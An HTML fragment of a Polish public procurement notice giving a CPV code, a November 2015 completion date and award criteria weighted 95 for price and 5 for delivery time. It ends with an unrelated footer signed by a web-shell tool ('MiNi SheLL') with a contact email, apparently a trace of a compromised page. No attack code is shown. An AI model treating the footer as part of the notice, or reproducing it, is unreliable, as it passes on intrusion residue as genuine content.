<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.52.55.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Czas realizacji zamówienia liczony od dnia podpisania umowy - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com